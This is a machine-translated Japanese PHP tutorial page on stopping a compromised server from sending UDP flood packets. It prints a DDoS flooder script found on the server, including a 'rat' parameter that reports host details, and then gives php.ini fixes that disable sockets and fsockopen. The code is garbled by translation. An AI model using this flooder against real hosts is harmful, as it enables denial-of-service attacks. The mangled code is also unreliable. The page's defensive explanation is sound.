phpddos 攻撃 (サーバーが外部ネットワークに大量のデータパケットを送信する) の解決策

ホームページ

バックエンド開発

PHPチュートリアル

phpddos 攻撃 (サーバーが外部ネットワークに大量のデータパケットを送信する) の解決策_PHP チュートリアル

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 20, 2016 am 11:10 AM

方法バッグ送信エクストラネット外部の攻撃データサーバ機械の突然私自身の解決する

今日、私のマシンの 1 台が突然、1 秒あたり 1G を超える大量のデータパケットを外部に送信しました。UDP パケットを禁止するポリシーを使用していたため、送信できませんでしたが、大量のデータパケットが送信されました。お金が足りないので、ついに解決する方法を見つけました。

まずソースコードを見てください

外部にリクエストするためにfsockopenを使用しているので、彼にリクエストさせないでくださいそれを設定してくださいphp.ini

コードは次のとおりです

コードをコピーしてください

set_time_limit(999999);
$host = $_GET['host'];
$ port = $_GET['port '];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)= =0 または StrLen($port ) == 0 または Strlen ($ exec_time) == 0) {
if (
_ Get ['Rat']) & lt; gt; {

echo $ _get ['ネズミ']. "]."|".GetHostByName($_SERVER

['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat' ]; exit}

$ max_time = time（）+$ exec_time; （ "udp：// $ host"、$ port、$ errno、$ errstr、5）; /1024=" .round($Sendlen/1024, 2) . ")kb / 1024 = " .

round($packets*$Sendlen/1024/1024, 2) . " mb

" ;

echo "送信レート:" .round($packets/$exec_time, 2) .round($packets/

$Sendlen/1024/1024, 2) . s";
?>

キーコードは

コードは次のとおりです

コードをコピーしてください

$fp = fsockopen("udp://$ip", $rand , $errno, $errstr, 5);

方法は非常に簡単で、UDP パケットをターゲットホストに送信し、上記の無限ループの定義により、より大きな圧力が発生します。

このスクリプトを実行するサーバーは最初に独自のネットワーク帯域幅、CPU、その他のリソースを大量に消費するため、この負荷がかかります。

このスクリプトを使用してターゲットサイトに圧力をかけたい場合は、複数のサーバー、DDOSでスクリプトを実行する必要があります

コードは次のとおりですallow_url_fopen = Offそうであれば、パッケージを送信できます

コードをコピー

コードは次のとおりです

コピーコード

拡張子 =php_sockets.dllに変更されました

APACHE、IIS、NGINX を再起動します
これにより、PHP DDOS がパッケージを送信できなくなります

さらに、一部のネチズンは次のように述べています

タイムアウトなしに設定されるスクリプトを無効にするのは非常に簡単です。1. set_time_limit 関数を無効にします。2. PHP のセーフモード (safe_mode=on) を有効にします

ソケット関数を無効にすると、すべてのソケットモジュールを直接無効にするか、fsockopen 関数を無効にできます

ソケットはパスワードを取得するためのメール送信によく使用されるため、有効にすることをお勧めします。セーフモードを直接実行しますが、

この場合、スクリプトは 30 秒ごとにタイムアウトします。30 秒ごとにクリックして DDOS を起動するほど孤独な「ハッカー」はいないと推定されます。。。

経験: この種の問題は通常、Web サイトのセキュリティとサーバーのセキュリティに注意を払う必要があります。macofee の使用方法を知っていれば、簡単に侵入されないようにする必要があります。ウェブサイトを制限した方が良いでしょう。

;拡張子= php_sockets.dll

声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

PHPの現在のステータス：Web開発動向を見てくださいApr 13, 2025 am 12:20 AM

PHPは、現代のWeb開発、特にコンテンツ管理とeコマースプラットフォームで依然として重要です。 1）PHPには、LaravelやSymfonyなどの豊富なエコシステムと強力なフレームワークサポートがあります。 2）パフォーマンスの最適化は、Opcacheとnginxを通じて達成できます。 3）PHP8.0は、パフォーマンスを改善するためにJITコンパイラを導入します。 4）クラウドネイティブアプリケーションは、DockerおよびKubernetesを介して展開され、柔軟性とスケーラビリティを向上させます。

PHP対その他の言語：比較Apr 13, 2025 am 12:19 AM

PHPは、特に迅速な開発や動的なコンテンツの処理に適していますが、データサイエンスとエンタープライズレベルのアプリケーションには良くありません。 Pythonと比較して、PHPはWeb開発においてより多くの利点がありますが、データサイエンスの分野ではPythonほど良くありません。 Javaと比較して、PHPはエンタープライズレベルのアプリケーションでより悪化しますが、Web開発により柔軟性があります。 JavaScriptと比較して、PHPはバックエンド開発により簡潔ですが、フロントエンド開発のJavaScriptほど良くありません。

PHP対Python：コア機能と機能Apr 13, 2025 am 12:16 AM

PHPとPythonにはそれぞれ独自の利点があり、さまざまなシナリオに適しています。 1.PHPはWeb開発に適しており、組み込みのWebサーバーとRich Functionライブラリを提供します。 2。Pythonは、簡潔な構文と強力な標準ライブラリを備えたデータサイエンスと機械学習に適しています。選択するときは、プロジェクトの要件に基づいて決定する必要があります。

PHP：Web開発の重要な言語Apr 13, 2025 am 12:08 AM

PHPは、サーバー側で広く使用されているスクリプト言語で、特にWeb開発に適しています。 1.PHPは、HTMLを埋め込み、HTTP要求と応答を処理し、さまざまなデータベースをサポートできます。 2.PHPは、ダイナミックWebコンテンツ、プロセスフォームデータ、アクセスデータベースなどを生成するために使用され、強力なコミュニティサポートとオープンソースリソースを備えています。 3。PHPは解釈された言語であり、実行プロセスには語彙分析、文法分析、編集、実行が含まれます。 4.PHPは、ユーザー登録システムなどの高度なアプリケーションについてMySQLと組み合わせることができます。 5。PHPをデバッグするときは、error_reporting（）やvar_dump（）などの関数を使用できます。 6. PHPコードを最適化して、キャッシュメカニズムを使用し、データベースクエリを最適化し、組み込み関数を使用します。 7

PHP：多くのウェブサイトの基礎Apr 13, 2025 am 12:07 AM

PHPが多くのWebサイトよりも優先テクノロジースタックである理由には、その使いやすさ、強力なコミュニティサポート、広範な使用が含まれます。 1）初心者に適した学習と使用が簡単です。 2）巨大な開発者コミュニティと豊富なリソースを持っています。 3）WordPress、Drupal、その他のプラットフォームで広く使用されています。 4）Webサーバーとしっかりと統合して、開発の展開を簡素化します。

誇大広告を超えて：今日のPHPの役割の評価Apr 12, 2025 am 12:17 AM

PHPは、特にWeb開発の分野で、最新のプログラミングで強力で広く使用されているツールのままです。 1）PHPは使いやすく、データベースとシームレスに統合されており、多くの開発者にとって最初の選択肢です。 2）動的コンテンツ生成とオブジェクト指向プログラミングをサポートし、Webサイトを迅速に作成および保守するのに適しています。 3）PHPのパフォーマンスは、データベースクエリをキャッシュおよび最適化することで改善でき、その広範なコミュニティと豊富なエコシステムにより、今日のテクノロジースタックでは依然として重要になります。

PHPの弱い参照は何ですか、そしていつ有用ですか？Apr 12, 2025 am 12:13 AM

PHPでは、弱い参照クラスを通じて弱い参照が実装され、ガベージコレクターがオブジェクトの回収を妨げません。弱い参照は、キャッシュシステムやイベントリスナーなどのシナリオに適しています。オブジェクトの生存を保証することはできず、ごみ収集が遅れる可能性があることに注意する必要があります。

PHPで__invoke Magicメソッドを説明してください。Apr 12, 2025 am 12:07 AM

\ _ \ _ Invokeメソッドを使用すると、オブジェクトを関数のように呼び出すことができます。 1。オブジェクトを呼び出すことができるように\ _ \ _呼び出しメソッドを定義します。 2。$ obj（...）構文を使用すると、PHPは\ _ \ _ Invokeメソッドを実行します。 3。ロギングや計算機、コードの柔軟性の向上、読みやすさなどのシナリオに適しています。

See all articles

ホットAIツール

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

脱衣画像を無料で

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

MinGW - Minimalist GNU for Windows

このプロジェクトは osdn.net/projects/mingw に移行中です。引き続きそこでフォローしていただけます。 MinGW: GNU Compiler Collection (GCC) のネイティブ Windows ポートであり、ネイティブ Windows アプリケーションを構築するための自由に配布可能なインポートライブラリとヘッダーファイルであり、C99 機能をサポートする MSVC ランタイムの拡張機能が含まれています。すべての MinGW ソフトウェアは 64 ビット Windows プラットフォームで実行できます。